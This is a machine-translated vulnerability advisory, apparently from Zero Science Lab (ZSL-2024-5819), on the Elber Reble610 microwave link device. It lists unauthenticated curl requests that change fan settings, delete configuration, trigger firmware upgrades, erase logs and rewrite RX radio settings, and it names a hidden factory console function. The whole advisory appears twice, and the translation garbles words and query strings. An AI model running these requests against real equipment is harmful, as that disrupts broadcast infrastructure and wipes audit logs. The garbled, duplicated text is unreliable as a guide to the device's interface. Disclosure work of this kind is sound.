Elber Reble610 M/ODU XPIC IP-ASI-SDH微波链接设备配置
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 0.01修订0
摘要: reble610具有准确的硬件设计,没有
内部电缆和完整的模块化。该单元由基本组成
底盘,带4个可提取的板,可维护和关键
操作,例如频率修改,易于效率。模块化
方法为数字处理模块的开发带来了
(包含调制器,解调器和数据接口)和RF模块
(包含发射器,接收器和通道过滤器)。从RF点
可以看,新的传输电路能够保证大约1瓦
在每个模块方案中,还引入宽带预校正
(取决于频带,最多1GHz)。
DESC:该设备患有未经验证的设备配置,并且
客户端隐藏功能披露。
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5819
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.PHP
18.08.2023
- -
#配置风扇
$ curl'http://target/json_data/fan?fan_speed=fan_target=warn_temp=alarm_temp='
应用配置
#删除配置
$ curl'http://target/json_data/conf_cmd?index=4cmd=2'
文件删除成功
#启动升级
$ curl'http://target/json_data/conf_cmd?index=4cmd=1'
升级成功启动
#日志擦除
$ curl'http://target/json_data/erase_log.js?直到=-2'
原木被删除
#直到:
#=0全部
#=-2昨天
#=-8上周
#=-15最近两个星期
#=-22最近三周
#=-31上个月
#设置Rx配置
$卷发'http://target/json_data/nbfmv2rx.setConfig?freq=2480000freq_offset=0mute=1sq_thresh=-90.0dec mode=0lr_swap=0preemph=0preemph_const=0deemph=0deemph_const=1CH_LR_ENABLE=0CH_R_GAIN=0.0CH l_gain=0.0CH_ADJ_CTRL=0CH_LR_ATT=1MPXDIG_ATT=0PILOT_TRIM=0.0MPXDIG_GAIN=0.0RDS_TRIM=0.0DEL ay_enable=0local_rds=0output_delay=0pi_code=0 _ mpx1_enable=1Mpx2_enable=1sca1_enable=1sca2_ enable=0MPX1_ATT=0MPX2_ATT=0SCA1_ATT=0SCA2_ATT=0MPX1_GAIN=0.0MPX2_GAIN=0.0SCA1_GAIN=0.0SCA2 _gain=0.0limiter_enable=falselim_1_gain=0.0+dblim_1_th=0.0+khzlim_1_alpha=0.0+%+%25setuptime=0 .0+msholdTime=0.0+msrelease -factor=0.0+db%2fSeclim_2_en=falselim_2_gain=0.0+dblim_2_th=0.0+k hzrds_gen=falsert_pi=rt_ps=rt_plus_en=falsert_line_a=rt_line_b=rt_af=rf_trap=0output_trap=0''
RX配置成功应用
#显示工厂窗口和FPGA上传(控制台)
cleber_show_factory_wnd()
# ETC。
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 0.01修订0
摘要: reble610具有准确的硬件设计,没有
内部电缆和完整的模块化。该单元由基本组成
底盘,带4个可提取的板,可维护和关键
操作,例如频率修改,易于效率。模块化
方法为数字处理模块的开发带来了
(包含调制器,解调器和数据接口)和RF模块
(包含发射器,接收器和通道过滤器)。从RF点
可以看,新的传输电路能够保证大约1瓦
在每个模块方案中,还引入宽带预校正
(取决于频带,最多1GHz)。
DESC:该设备患有未经验证的设备配置,并且
客户端隐藏功能披露。
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5819
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.PHP
18.08.2023
- -
#配置风扇
$ curl'http://target/json_data/fan?fan_speed=fan_target=warn_temp=alarm_temp='
应用配置
#删除配置
$ curl'http://target/json_data/conf_cmd?index=4cmd=2'
文件删除成功
#启动升级
$ curl'http://target/json_data/conf_cmd?index=4cmd=1'
升级成功启动
#日志擦除
$ curl'http://target/json_data/erase_log.js?直到=-2'
原木被删除
#直到:
#=0全部
#=-2昨天
#=-8上周
#=-15最近两个星期
#=-22最近三周
#=-31上个月
#设置Rx配置
$卷发'http://target/json_data/nbfmv2rx.setConfig?freq=2480000freq_offset=0mute=1sq_thresh=-90.0dec mode=0lr_swap=0preemph=0preemph_const=0deemph=0deemph_const=1CH_LR_ENABLE=0CH_R_GAIN=0.0CH l_gain=0.0CH_ADJ_CTRL=0CH_LR_ATT=1MPXDIG_ATT=0PILOT_TRIM=0.0MPXDIG_GAIN=0.0RDS_TRIM=0.0DEL ay_enable=0local_rds=0output_delay=0pi_code=0 _ mpx1_enable=1Mpx2_enable=1sca1_enable=1sca2_ enable=0MPX1_ATT=0MPX2_ATT=0SCA1_ATT=0SCA2_ATT=0MPX1_GAIN=0.0MPX2_GAIN=0.0SCA1_GAIN=0.0SCA2 _gain=0.0limiter_enable=falselim_1_gain=0.0+dblim_1_th=0.0+khzlim_1_alpha=0.0+%+%25setuptime=0 .0+msholdTime=0.0+msrelease -factor=0.0+db%2fSeclim_2_en=falselim_2_gain=0.0+dblim_2_th=0.0+k hzrds_gen=falsert_pi=rt_ps=rt_plus_en=falsert_line_a=rt_line_b=rt_af=rf_trap=0output_trap=0''
RX配置成功应用
#显示工厂窗口和FPGA上传(控制台)
cleber_show_factory_wnd()
# ETC。